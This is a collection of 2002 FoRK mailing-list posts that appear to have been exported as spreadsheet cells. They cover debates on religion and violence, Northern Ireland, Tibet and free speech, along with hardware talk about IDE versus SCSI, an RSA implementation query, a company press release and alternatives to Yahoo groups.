    <t>John Hall wrote:&gt;&gt;From: Stephen D. Williams [mailto:swilliams@hpti.com]
&gt;&gt;    
&gt;&gt;
&gt;&gt;Bush's reluctance to blast blind obeyance of religion as taught by
&gt;&gt;
&gt;your
&gt;  
&gt;
&gt;&gt;local madrassa or KKK leader, apparently because he is fully involved
&gt;&gt;with the general effort to expand unfettered religiosity as the
&gt;&gt;    
&gt;&gt;
&gt;solution 
&gt;
&gt;&gt;to the world's ills, is disappointing.  He has spoke against madrassa,
&gt;&gt;but what I heard sounded lame and carefully crafted to shield religion
&gt;&gt;in general from scrutiny.
&gt;&gt;    
&gt;&gt;
&gt;
&gt;1. Which religion and how it is currently being expressed matters.
&gt;
A)  Which religion is it that can claim no foul actions in its past? 
 Certainly not Christianity, Islam, etc.
B) "How it is currently being expressed" amounts to a tacit 
acknowledgement that the sophistication of the society involved and 
people's self-limiting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aren't 'found in the wild'.(By "primitive expression", I don't mean to slight any society, but that 
there is some chronic evidence of irrational mob actions and uncivilized 
behavior (killing infants, women to break religious blue laws, etc.). 
 The US has only really been mostly free of "primitive expression" for 
40-50 years, although large categories, including serious religious 
conflict, were settled quite a while ago.)D)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doesn't?)(I couldn't find the article I remember, but here are a couple of others:)
http://www.washingtonpost.com/ac2/wp-dyn?pagename=article&amp;node=&amp;contentId=A33761-2001Jul8&amp;notFound=true
http://www.washingtonpost.com/ac2/wp-dyn?pagename=article&amp;node=&amp;contentId=A15956-2002Jul16&amp;notFound=true'Northern Ireland is a British province of green valleys and 
cloud-covered hills whose 1.6 million people are politically and 
religiously divided. About 54 percent of the population is Protestant, 
and most Protestants are unionists who want the province to remain part 
of Britain. The Roman Catholic minority is predominantly republican, or 
nationalist; they want to merge with the Republic of Ireland to the south.
In 1968, Catholic leaders launched a civil rights drive modeled on the 
Rev. Martin Luther King Jr.'s campaign in the American South. But 
violence quickly broke out, with ancient religious animosities fueling 
the political argument. Armed paramilitary groups sprung up on both 
sides. Police records and historians agree that the most lethal group by 
far was the IRA, fighting on the Catholic side with a goal of a united 
IrelandThe provincial police force estimates that about 3,600 people were 
killed during the 30-year conflict known, with characteristic Northern 
Ireland understatement, as "The Troubles."'&gt;2. The US is trying to avoid making war on the Muslim religion.
&gt;
That's fine, as it would be an inappropriate concentration.  It would be 
difficult to address the issues raised here in a clean way.  I'd be 
happy with an acknowledgement that the connection is there.&gt;3. US Leadership remains reflexively multi-cultural.
&gt;
This is ok to a point, as long as it doesn't shy away from logical, 
objective analysis of when a society could be seriously improved in 
certain ways.&gt;&gt;We all have
&gt;&gt;disagreements, but at some point it becomes a crime against humanity.
&gt;&gt;    
&gt;&gt;
&gt;
&gt;I didn't say burning the train was a good thing.  I said I understood it
&gt;wasn't a spontaneous attack on people who had done no wrong.
&gt;True, although I don't think you were as clear originally.  :-)sdw</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; From: Stephen D. Williams [mailto:sdw@lig.net]
&gt; Sent: Monday, September 16, 2002 7:42 PM&gt; &gt;1. Which religion and how it is currently being expressed matters.
&gt; &gt;
&gt; A)  Which religion is it that can claim no foul actions in its past?
&gt;  Certainly not Christianity, Islam, etc.Hence the qualifier 'current'.&gt; B) "How it is currently being expressed" amounts to a tacit
&gt; acknowledgement that the sophistication of the society involved and
&gt; people's self-limiting reasonableness are important to avoid primitive
&gt; expression.  This leads to the point that religion and less
&gt; sophisticated societies are a dangerous mix.  It also tends to invoke
&gt; the image of extremes that might occur without diligent maintenance of
&gt; society.The tacit acknowledgement and self-limiting you speak of is not a given
or a function of 'sophistication' but is primarily a feature of
(current) Western Civilization.  Of course, 'sophisticated' and 'Western
Civilization' are essentially equivalent IMHO.  But it need not be so.&gt; D) The Northern Ireland Protestant vs. Catholic feud, recently more or
&gt; less concluded, is not completely unlike this kind of friction
generated
&gt; by splitting society too much along religious lines.  One Post article
&gt; pointed out that the problem basically stemmed from the vertical
&gt; integration of areas along religious lines all the way to schools,
&gt; government, political party, etc.  (Of course both cases have a
heritage
&gt; of British conquest, but who doesn't?)And sometimes the religious component is a faÃ§ade for an equally
dangerous ethnic affiliation.  Hindu extremism isn't about the Hindu
religious theology as far as I can see.  It is a peg to hang an ethnic
identity and identity politics on.Muslim extremism appears to have a far greater connection to theology.&gt; 'Northern Ireland is a British province of green valleys and
&gt; cloud-covered hills whose 1.6 million people are politically and
&gt; religiously divided. About 54 percent of the population is Protestant,
&gt; and most Protestants are unionists who want the province to remain
part
&gt; of Britain. The Roman Catholic minority is predominantly republican,
or
&gt; nationalist; they want to merge with the Republic of Ireland to the
south.Yep, all because the Scots ate oats and starved their Irish out long
ago, while the English preferred wheat and that doesn't grow so well in
Ireland.  That and the introduction of potatoes saved the Irish as
Irish.&gt; That's fine, as it would be an inappropriate concentration.  It would
be
&gt; difficult to address the issues raised here in a clean way.  I'd be
&gt; happy with an acknowledgement that the connection is there.Oh, I think we are in a war with wide aspects of the Muslim religion.  I
know it is there, but it just might not be appropriate to admit it
publicly.&gt; &gt;3. US Leadership remains reflexively multi-cultural.
&gt; &gt;
&gt; This is ok to a point, as long as it doesn't shy away from logical,
&gt; objective analysis of when a society could be seriously improved in
&gt; certain ways.I didn't say this was a *good* thing.  With the exception of ethnic
restaurants, I can generally be counted on to oppose anything labeled
'multi-cultural'.&gt; &gt;I didn't say burning the train was a good thing.  I said I understood
it
&gt; &gt;wasn't a spontaneous attack on people who had done no wrong.
&gt; &gt;
&gt; 
&gt; True, although I don't think you were as clear originally.  :-)I'm sure I wasn't.</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Date: Mon, 16 Sep 2002 14:57:27 -0700
To: nettime-l@bbs.thing.net
From: Phil Duncan 
Subject:  The War Prayer
Sender: nettime-l-request@bbs.thing.net
Reply-To: Phil Duncan The following prayer is from a story by Mark Twain, and was quoted by Lewis
Laphan in the October issue of Harper's magazine. It occurs at the very end
of an excellent article which I recommend to you.In the story, an old man enters a church where the congregation has been
listening to an heroic sermon about "the glory to be won in battle by young
patriots armed with the love of God." He usurps the pulpit and prays the
following:"O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ever-faithful refuge and friend of all that
are sore beset and seek His aid with humble and contrite hearts. Amen."Twain wrote the story, "The War Prayer," in 1905 during the American
occupation of the Philippines, but the story wasn't printed until 1923,
thirteen years after his death, because the editors thought it "unsuitable"
for publication at the time it was written.#  distributed via : no commercial use without permission
#   is a moderated mailing list for net criticism,
#  collaborative text filtering and cultural politics of the nets
#  more info: majordomo@bbs.thing.net and "info nettime-l" in the msg body
#  archive: http://www.nettime.org contact: nettime@bbs.thing.net---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</si>
  <si>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On Mon, 16 Sep 2002, Stephen D. Williams wrote:&gt; To make what work?  I already pointed out that a single drive is
&gt; comparable between IDE/SCSI.Alas, that's wrong. Both the drives are faster (10..15 krpm vs. ~7 krpm,
faster seek), and the EIDE protocol is ridiculously dumb (queing;
disconnect).
&gt; I think you're wrong with recent releases.  I'll check this week. 
&gt; There's also JFS and XFS.None of them are production quality. Right now only ext2 and ext3 qualify.  
It will take a good while (a year, or two) before we can trust anything
else.
&gt; &gt;SCSI has got advantages still, particular if it comes to off-shelf 
&gt; &gt;high-density racks.
&gt; &gt;
&gt; Check out RaidZone.com.Have you looked inside a dual-CPU 1U Dell? Three drives are easy to get 
in. Anything else would require a redesign, and would in nontrivial 
thermal engineering issues.
&gt; A number of vendors are putting the Promise IDE hardware on the
&gt; motherboard.  All that remains is the proper drive socket.I can't think of a single major vendor who sells 1U systems with hardware
EIDE RAID.&gt; Additionally, you can get hardware IDE raid as a pair of drive bays or
&gt; even an IDE-IDEx2 controller that can be screwed into a 1U chassis.I believe you that stuff can be found, if one is looking for it. However, 
I wouldn't put this into production unless I've had that system hanging in 
the local rack under simulated load for a half a year.
</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to claim the parenthood of desktop web services,
but then there's a ton of people doing it now.  What I am the parent of is, Jackson Alan Bolcer--I just
realized that the birth announcement was something that
didn't get sent through due to my general laziness of
being kicked off of FoRK from our stupid DNS fiasco
mixed with the post filtering.   August 20th, 7lbs, 14oz,
8:30pm.  GregGeege Schuman wrote:
&gt; 
&gt; Aren't you Dr. Gregory A. Bolcer, Dutch Uncle of P2P?
&gt; 
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
&gt; Gregory Alan Bolcer
&gt; Sent: Saturday, September 14, 2002 10:21 AM
&gt; To: FoRK
&gt; Subject: introductions
&gt; 
&gt; As I've had to resubscribe to fork and fork-noarchive,
&gt; I guess I have to reintroduce myself.  I'm formerly
&gt; known as gbolcer at endtech dot com to the FoRK
&gt; mailman program, formerly an overposter, and love
&gt; soaking up bits through avid reading or scanning
&gt; of almost every single list that's got informative to say.
&gt; 
&gt; Hopefully all those overpost will get cleared out at
&gt; somepoint and fork-archived.
&gt; 
&gt; Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">"Adam L. Beberg" wrote:
&gt; 
&gt; So, who has done RSA implementation before?
&gt; Having a typo-I-cant-spot problem with my CRT...
&gt; 
&gt; - Adam L. "Duncan" Beberg
&gt;   http://www.mithral.com/~beberg/
&gt;   beberg@mithral.com
&gt; 
&gt; http://xent.com/mailman/listinfo/forkDone a ton of them, both with and without their
stuff.  With is definitely easier.[1]Greg[1] http://www.endeavors.com/PressReleases/rsa.htm Endeavors Technology and RSA Security Form Strategic Partnership to 
 Enhance SSL Performance in Secure, Enterprise-Scalable P2P ComputingEndeavors Technology and RSA Security combine their respective peer-to-peer Magi Enterprise 
Web collaboration and RSA BSAFEÂ® software for SSL users to instantly extend security and improve performance
of 
desktop and corporate data sharing, and Web interaction between workgroups inside and across corporations.Irvine (CA) and Cambridge (UK), September 12, 2002 - Secure web collaboration software leader Endeavors
Technology, Inc. today
announced a technology sharing and marketing agreement with RSA Security Inc. the most trusted name in
e-security.Â® This strategic
partnership is aimed at extending the security and improving the performance of the standard SSL security
protocol used by every e-based
desktop, laptop and server. Under the terms of the agreement, RSA Security's trusted security tools are embedded into Endeavors
Technology's award-winning Magi
Enterprise software product. The combined solution enables IT managers and users to simply extend security and
encryption to every
Magi-enabled device for the direct device-to-device sharing and interaction of corporate data and workflow
between workgroups within and
beyond the enterprise.Secure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Magi's secure RSA Security-based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business-centric
peer-to-peer computing"Endeavors Technology joins the RSA SecuredÂ® Partner Program. The program is designed to ensure complete
interoperability between
partner products and RSA Security's solutions including RSA SecurIDÂ® two-factor authentication, RSA
ClearTrustÂ® Web access
management, RSA BSAFEÂ® encryption and RSA KeonÂ® digital certificate management.The strategic partnership paves the way for Magi Enterprise to bear the RSA Secured brand on product packaging
and advertising, be listed in
RSA Secured Partner Solutions directories, and have RSA Security's out-of-the-box, certified interoperability.
It will also lead to joint
marketing and promotional activities between the two firms, mutual field sales engagement opportunities on
joint accounts, and 24x7 worldwide
business continuity support."Endeavors Technology is taking a leadership role by providing the highest-level of security in its enterprise
products and streamlining the
deployment process for IT managers," says Stuart Cohen, director of partner development at RSA Security. "By
combining our products,
enterprise customers have a solution that provides encryption and authentication across firewalls."About Magi
Magi Enterprise 3.0, an award-winning web collaboration system, transforms today's Web into a highly secure
inter- and intra-enterprise
collaboration network.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an intuitive graphical interface, and universal name
spaces generating "follow me URLs"
for mobile professionals.About RSA Security, Inc.
RSA Security Inc., the most trusted name in e-security, helps organizations build secure, trusted foundations
for e-business through its RSA
SecurID two-factor authentication, RSA ClearTrust Web access management, RSA BSAFE encryption and RSA Keon
digital certificate
management product families. With approximately one billion RSA BSAFE-enabled applications in use worldwide,
more than ten million RSA
SecurID authentication users and almost 20 years of industry experience, RSA Security has the proven
leadership and innovative technology to
address the changing security needs of e-business and bring trust to the online economy. RSA Security can be
reached at
www.rsasecurity.com.About Endeavors Technology, Inc.
Endeavors Technology, Inc. is a wholly-owned subsidiary of mobile computing and network infrastructure vendor
Tadpole Technology plc
(www.tadpole.com), which has plants and offices in Irvine and Carlsbad (California), and Cambridge, Edinburgh,
and Bristol (UK). For further
information on Endeavors' P2P solutions, call 949-833-2800, email to p2p@endeavors.com, or visit the company's
website
www.endeavors.com. 
Copyright 2002 Endeavors Technology, Inc. Magi, and Magi Enterprise are registered trademarks of Endeavors
Technology, Inc. RSA, BSAFE, ClearTrust, Keon, SecurID, RSA Secured and The Most
Trusted Name in e-Security are registered trademarks or trademarks of RSA Security Inc. in the United States
and/or other countries. All other products and services mentioned are trademarks of their
respective companies.            Â© 2002 Endeavors Technology, Inc., 19600 Fairchild, Suite 350, Irvine, CA 92612, phone
949-833-2800, fax 949-833-2881, email info@endeavors.com.
                           All rights reserved; specifications and descriptions subject to change without
notice.
</t>
  </si>
  <si>
    <t xml:space="preserve">http://spineless.org/~mod/pix/octoberMoon.jpg
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "S" == Stephen D Williams  writes:    S&gt; A) Which religion is it that can claim no foul actions in its
    S&gt; past?  Certainly not Christianity, Islam, etc.Rastafari.That is, if you concede that of the two founding branches, only the
one founded by the Nyabingi were legit and the others were
thinly-veneered anti-colonial hooligans.  There is also Vietnamese Buddhism, unless you count setting fire to
oneself as a "foul action".    S&gt; C) Many splinter Christianity religions have 'clean hands' but
    S&gt; they also aren't 'found in the wild'.You'd have to explain "found in the wild".  For example, I know of
no violence perpetrated by the South Pacific "Cargo Cults" outside
of a pretty darn /mean/ game of cricket.    S&gt; D) The Northern Ireland Protestant vs. Catholic feud, recently
    S&gt; more or less concluded, is not completely unlike this kind of
    S&gt; friction generated by splitting society too much along
    S&gt; religious lines.  One Post article pointed out that the problem
    S&gt; basically stemmed from the vertical integration of areas along
    S&gt; religious lines all the way to schools, government, political
    S&gt; party, etc.  (Of course both cases have a heritage of British
    S&gt; conquest, but who doesn't?)When we launched the Native Net in 1989, one of the first things we
noticed on networking aboriginal groups around the world is that the
British Army, with the US Army as a proxy by extension, were the
common thread.  Where neither was present (physically or through
influence) there /tended/ to be less violence.The issue in Ireland is complex, but rest assured that religious
aspects are only a co-incidence of the invader/colonials being
predominantly members of the Royal-headed Anglicans and the aboriginal
population being predominantly members of the Pope-headed Catholics.
The conflict itself has nothing to do with ideology or practice, since
the Anglican Church is a near-identical clone of Catholicism.(now I bet that's going to attract some healthy debate ;)    S&gt; .. most Protestants are unionists who want the
    S&gt; province to remain part of Britain.Mebst. Mebst.  It's the other way around.  Most Unionists are protestants.
It's their _Unionism_ that is the source of the conflict, not their
sacriments.    S&gt; ... Police records and historians agree that the most lethal
    S&gt; group by far was the IRA, fighting on the Catholic side with a
    S&gt; goal of a united IrelandAnd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rule?Just wondering.    &gt;&gt; 2. The US is trying to avoid making war on the Muslim religion.It is interesting to me that the Canadian media is trying to paint
Chretien as some sort of buffoon for saying that 3rd-world poverty was
a major contributor to 9-11.  If they'd /watch/ his now-infamous
interview, they'd see that it's still us-against-hooligans, but his
point is that the hooligans would not be able to find friendly states
so easily if those states were not so bled-dry by the west.The same is true of street-gangs: When people are disenfranchised,
it's easier to offer them the Triad as a new family.  You get
cellphones, cars, a dry place to live.  Triad, biker gangs, mafia, the
IRA, Al Queda ... we've been fighting the War on Terrorism for as long
as there's been commerce, so you'd think we'd /realize/ that
escalation of violence is not a solution.-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
Gary Lawrence Murphy said:
&gt; &gt;&gt;&gt;&gt;&gt; "S" == Stephen D Williams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action".What about Tibetan Buddhism BTW?  They seem like an awfully nice bunch
of chaps (and chapesses).&gt;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;)Man, I'm not going *there* again ;)  I'll agree, though, that the ideology
or practices of the religions have very little to do with the conflict.&gt;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solution.Well said!--j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Chuck Murcko wrote:
&gt; &gt; The usual crud.  Why do morons ranting and beating their chests in the
&gt; &gt; National Review (or similar rags) merit FoRKing?
&gt; Probably because we have this pesky 1st Amendment thing here.  [...]It must be so great in the US.  The rest of us live in caves and have
no such thing as free speech.
BTW, I wasn't aware that the 1st Amendment mandated that crap must be FoRKed.
&gt; You can just ignore it if you wish.I will, thanks.
&gt; But I must feel obligated to defend to the death your right to do so.ï¿½Je dï¿½sapprouve ce que vous dites, mais je dï¿½fendrai jusqu'ï¿½ ma mort votre
droit de le direï¿½
- Arouet Le Jeune, dit ï¿½Voltaireï¿½ (1694-1778).
R
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-09-17 at 12:50, Justin Mason wrote:
&gt; What about Tibetan Buddhism BTW?  They seem like an awfully nice bunch
&gt; of chaps (and chapesses).They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Tibetans.]Luis
</t>
  </si>
  <si>
    <t xml:space="preserve">I have been told to take anything read in Pravda with a grain of salt...
but
this article certainly looks impressive when paired together with this other
one from the associated press...Just the concept makes me shudder, imagining how easy it must be to smuggle
these things around some parts of Europe right now.Hopefully, it's just my imagination.-- Michael Cummins
   Fort Lauderdale, FL----------------------------------------------------------------------------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</si>
  <si>
    <t xml:space="preserve">On Tue, Sep 17, 2002 at 10:19:13AM -0700, Chuck Murcko wrote:
&gt; Probably because we have this pesky 1st Amendment thing here. Still, 
&gt; lots of us in the States have developed a disturbing tendency to shout 
&gt; down or (in recent years) shackle in legal BS opinions, thoughts, and 
&gt; individual behaviors we don't agree with.
&gt; Except that parroting the party line doesn't really require much
freedom of speech. Now if you had posted something from a left of
center source, you would have been shouted down in flames, buried in 
ad hominem attacks, and probably get your name added to an FBI list.  
Besides the basic rule in the United States now is "I'll defend your
rights to say anything you want, but if it isn't appropriately
neoconish, well, don't expect to work":
HHS Seeks Science Advice to Match Bush ViewsBy Rick Weiss
Washington Post Staff Writer
Tuesday, September 17, 2002; Page A01The Bush administration has begun a broad restructuring of the
scientific advisory committees that guide federal policy in areas such
as patients' rights and public health, eliminating some committees
that were coming to conclusions at odds with the president's views and
in other cases replacing members with handpicked choices. 
...
http://www.washingtonpost.com/wp-dyn/articles/A26554-2002Sep16.htmlOwen
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Justin Mason  writes:    J&gt; What about Tibetan Buddhism BTW?  They seem like an awfully
    J&gt; nice bunch of chaps (and chapesses).Yes, them too.  When wolves attack their sheep, they coral the wolf
into a quarry and then throw rocks from the surrounding cliffs so
that "no one will know who killed the wolf"In Samskar, before the Chinese arrived, there had not been a killing
in over 2000 years, and the last recorded skirmish, over rights to
a water hole, had happened several generations ago.-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Probably because we have this pesky 1st Amendment thing here. Still, 
lots of us in the States have developed a disturbing tendency to shout 
down or (in recent years) shackle in legal BS opinions, thoughts, and 
individual behaviors we don't agree with.You can just ignore it if you wish. But I must feel obligated to defend 
to the death your right to do so.ChuckOn Monday, September 16, 2002, at 06:54 AM, Robert Harley wrote:The usual crud.  Why do morons ranting and beating their chests in the
National Review (or similar rags) merit FoRKing?
</t>
  </si>
  <si>
    <t>On Tue, 2002-09-17 at 11:16, Gary Lawrence Murphy wrote:
&gt; &gt;&gt;&gt;&gt;&gt; "J" == Justin Mason  writes:
&gt; 
&gt;     J&gt; What about Tibetan Buddhism BTW?  They seem like an awfully
&gt;     J&gt; nice bunch of chaps (and chapesses).
&gt; 
&gt; Yes, them too.  When wolves attack their sheep, they coral the wolf
&gt; into a quarry and then throw rocks from the surrounding cliffs so
&gt; that "no one will know who killed the wolf"
&gt; 
&gt; In Samskar, before the Chinese arrived, there had not been a killing
&gt; in over 2000 years, and the last recorded skirmish, over rights to
&gt; a water hole, had happened several generations ago.
I'm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(e.g. American
Indians) develop a profit motive for maintaining and promoting the myth
in popular culture.I'm far more inclined to believe that people is people, no matter where
you are on the planet.  The only time you see any anomalies is when you
have a self-selecting sub-population within an otherwise normal
population, which is hardly a fair way to look at any major population.-James Rogers
 jamesr@best.com</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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off.Chemistry types have a method for
dealing with this question without
dragging in the calculus:Suppose an atmosphere to be mainly
affected by gravity, resulting in
the potential energy for a mass M
to be linear in height h: Mgh.What relative concentrations will
we have when two different packets
of air are in equilibrium?If they are at the same height, we
will have half the mass in one, and
half the mass in the other, and the
amount flowing from one to the other
balances the amount flowing in the
opposite direction.[0]If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airNow, rates are exponential in
energy differences[1], so that
theoretically we should expect
an exponential decay in height,
to compensate.  How does it go
in practice?-Dave[0] How well does it balance?
    Chemical equilibria seem 
    stable, as they deal with
    very large numbers over a
    very long time.  Economic
    equilibria are viewed from
    the mayfly standpoint of
    individual people, and so,
    at best, the shot noise is
    very visible.[1] That is to say, rates will
    be exponential in the free
    energy differences between
    endpoints and a transition
    state.  We can ignore that
    complication in this model.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: yyyy@spamassassin.taint.org [mailto:yyyy@spamassassin.taint.org]
&gt; Sent: Tuesday, September 17, 2002 9:50 AM
&gt; &gt; ... we've been fighting the War on Terrorism for as long
&gt; &gt; as there's been commerce, so you'd think we'd /realize/ that
&gt; &gt; escalation of violence is not a solution.
&gt; 
&gt; Well said!
&gt; 
&gt; --j.Yeah.  It certainly wasn't a solution to the Carthaginian problem or the
Barbary Pirates.  Wait ... no ... actually ... it was a rather permanent
solution.
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "Luis Villa" &gt;
&gt; They were the ruling class of a feudal, farming society for quite some
&gt; time; I believe there were more than a few issues there. Certainly, not
&gt; everyone in Tibet is as excited about the Dalai Lama as Hollywood
&gt; appears to be. [Not that the Chinese are much better rights-wise, but
&gt; they've actually built roads and such, which led to the creation of
&gt; merchant classes and the like that never existed under the Tibetans.]
And it's not /going/ to exist under the Tibetans, because it'll be owned and
operated by Chinese nationals.
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:01 PM -0700 on 9/17/02, James Rogers wrote:
&gt; The Primitive People pull a fast one on Whitey The Junior
&gt; AnthropologistOr Margaret, in the case of a famous proto-feminist...Cheers,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</si>
  <si>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Because of this:
http://hrw.org/press/2002/08/yahoo080902.htm
there are several of us who are in the BDSM lifestyle who are trying to 
encourage our local groups to find alternatives to yahoo groups as a way 
of communicating with each other.  I've set up a place to have maillists 
on my server for any group who wants to use it, but I was wondering if 
anyone knows of an alternative that allows all the bells and whistles that 
yahoo has, such as reminders, file storage, calendars, etc.  Anyone?
TIA,
Cindy-- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>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7.3.http://www.asacomputers.com/cgi-bin/index.fcg?action=displayscreen&amp;templateid=25There's some interesting info at:http://mit.fnal.gov/~msn/cdf/caf/server_evaluation.htmlWe've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fun.Oddly, even fairly beefy systems like these will breathe hard to keep up 
with the new STK 9940B tape drives, which crank along at a steady 
30GB/s.  And you oldforktimers will remember "doofus" my old file server 
system.  It would only take 2.1" of rackspace now, instead of 14 racks.Cheers,
Wayne
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, it's nice to be back in America's flaccid state ...Seems like only yesterday we were suffering electile dysfunction ...Maybe if they made the ballot ovals look like little blue pills ...No, seriously ... I'm here all week ... You were great ...
'nite everybody
</t>
  </si>
  <si>
    <t xml:space="preserve">
I'm a bit confused about this boycott thing.  How is what China is
doing any different than having Scientology and who ever else
state-side who takes the whim evoking the DMCA to close down foreign
sites they deem inappropriate?  At least the Chinese make it voluntary
and ask politely, rather than just sending legal musclemen first off.-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Robert Harley writes:
&gt; Chuck Murcko wrote:&gt; &gt; But I must feel obligated to defend to the death your right to do so.
&gt;
&gt; Â«Je dÃ©sapprouve ce que vous dites, mais je dÃ©fendrai jusqu'Ã  ma mort votre
&gt; droit de le direÂ»
&gt; - Arouet Le Jeune, dit Â«VoltaireÂ» (1694-1778).Here's hoping that tradition perseveres for the novelist
currently on trial in Paris for calling Islam "the stupidest
religion"...http://ca.news.yahoo.com/020917/5/ozxa.html# Tuesday September 17 11:07 AM EST
#
# French Writer Tried As Anti-Islam, Protest Erupts
# By Caroline Brothers
#
# PARIS (Reuters) - Provocative French novelist Michel Houellebecq
# faced a Paris court on Tuesday for allegedly inciting racial hatred
# by calling Islam "the stupidest religion" and its holy book the
# Koran a depressing read.
#
# The case, brought against him by four Muslim groups, is a cause
# celebre reminiscent of the Salman Rushdie affair, pitting freedom of
# expression against religious sensitivities.
#
# The Muslim groups, which include the Mecca-based World Islamic
# League and the Paris Mosque, accuse the writer of insulting Islam in
# an interview with the literary magazine "Lire" during last year's
# launch of his novel "Plateforme."
#
# Lire is also on trial over the remarks, which have taken on an added
# significance in France in the atmosphere of heightened sensitivity
# and concern about Islam following the September 11 attacks by Muslim
# radicals in the United States.
#
# Shortly after the trial started, 11 people in the courtroom stripped
# off their shirts to reveal T-shirts saying "No to the censure of the
# imams" and "Marianne veiled, Marianne raped" -- a reference to the
# female symbol of the French republic.
#
# "Freedom of expression! freedom of expression!" they and other
# Houellebecq supporters chanted after they were thrown out of the
# courtroom at the main law courts in central Paris.
#
# While intellectuals argued before the trial that Houellebecq should
# be free to write what he wants, Lyon Mosque rector Kamel Kabtan
# retorted: "We are for freedom of expression, but not for insulting
# communities."
#
# BETE NOIRE
#
# Houellebecq, 45, the bete noire of contemporary French literature,
# is no stranger to controversy. He offended conservatives and the
# politically correct left with his 1998 novel "Les Particules
# Elementaires" ("Atomised" in English).
#
# Paris Mosque rector Dalil Boubakeur says Muslims have been insulted
# once before by Houellebecq, who had the main character in Plateforme
# admit he felt "a quiver of glee" every time a "Palestinian
# terrorist" was killed.
#
# The World Islamic League, the Lyon Mosque and the National
# Federation of Muslims in France have joined the Paris Mosque in
# bringing Houellebecq to trial.
#
# France's Human Rights League joined them as a civil party, saying
# Houellebecq's comments amounted to "Islamophobia" and deserved to be
# sanctioned as part of the league's struggle against discrimination
# and racism.
#
# The Paris Mosque has hired Jean-Marc Varaut, one of France's leading
# trial lawyers, whose past clients include Maurice Papon, the former
# official condemned in 1998 for Nazi-era crimes against humanity for
# sending Jews to death camps.
#
# RESTORING BLASPHEMY?
#
# Houellebecq's lawyer Emmanuel Pierrat argues that the case
# effectively re-establishes the notion of blasphemy, despite the fact
# that France as a secular state has no such law, and says
# Houellebecq's opponents want to deny him freedom of expression.
#
# He also argues that the interview in Lire truncated a six-hour
# conversation and Houellebecq was not given the chance to approve the
# article before it appeared.
#
# Houellebecq's publisher Flammarion has distanced itself from the
# author, whose comments some say may have cost him France's
# prestigious Goncourt prize -- for which he had been a contender.
#
# The novelist, who lives outside Cork, Ireland, writes in a detached
# style about a bleak world in which people have forgotten how to
# love.
#
# Translated into 25 languages, "Atomised" incensed France's 1968
# generation with its scathing descriptions of the hippie era but won
# him France's November prize in 1998 and the Impac award, one of the
# world's biggest fiction prizes.
#
# Losing his case may mean a year in jail or a $51,000 fine.- Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">"Adam L. Beberg" wrote:
&gt; So, who has done RSA implementation before?/me raises hand.
&gt; Having a typo-I-cant-spot problem with my CRT...Send me the source.
R
</t>
  </si>
  <si>
    <t xml:space="preserve">Pity.  Reading that woman's ad and knowing Rohit for years, they sound
like a match made in heaven.  But why, oh, why, keep that shaved-head
photo on prominent display???  There are lots of photos of Rohit
looking rather dashing, and with the crucial hair feature enabled!R
</t>
  </si>
  <si>
    <t xml:space="preserve">CDale wrote:
&gt; 
&gt; I was wondering if anyone knows of an alternative that allows
&gt; all the bells and whistles that yahoo has, such as reminders,
&gt; file storage, calendars, etc.SmartGroups, I think.
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Sep 17, 2002 at 09:11:01PM -0700, Paul Prescod wrote:
&gt; Owen Byrne wrote:
&gt; &gt;...
&gt; &gt;
&gt; &gt;Except that parroting the party line doesn't really require much
&gt; &gt;freedom of speech. Now if you had posted something from a left of
&gt; &gt;center source, you would have been shouted down in flames, buried in 
&gt; &gt;ad hominem attacks, and probably get your name added to an FBI list. 
&gt; 
&gt; Do you think it is really useful to combat hysterical right-wing 
&gt; propoganda with hysterical left-wing propoganda?
&gt; 
Sure it is - it tends to bring out the people who let "hysterical
right wing propaganda" spew forth, while reaching for their gun 
whenever a "liberal" enters the room.my hysterical left wing "propaganda" is generally an emotional
reaction on a mailing list, not an organizaed attempt at converting
people's thinking through lies and distortion (as was the original
article). Whereas your constant and predictable brandings of my postings are, to
 my mind, a deliberate and reasoned  effort to reduce debate, and
 discourage left of center postngs. Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Well I don't think China could force Yahoo! to give up info.  So if they 
are so willing to give it, why wouldn't they be willing to give info to 
some silly group who may one day decide to get a hair up their ass about 
the practice of BDSMers? (not to mention folks who don't even practice, 
but who are just interested in information) What about folks who are 
interested in talking about software security issues?  Didja read about 
the guy in China who got 11 years for downloading and printing out pro-democracy 
info?
http://www.democracy.org.hk/EN/2002/aug/news_04.html
I'm confused about what you're confused about.
CindyOn 18 Sep 2002, Gary Lawrence Murphy wrote:&gt; 
&gt; I'm a bit confused about this boycott thing.  How is what China is
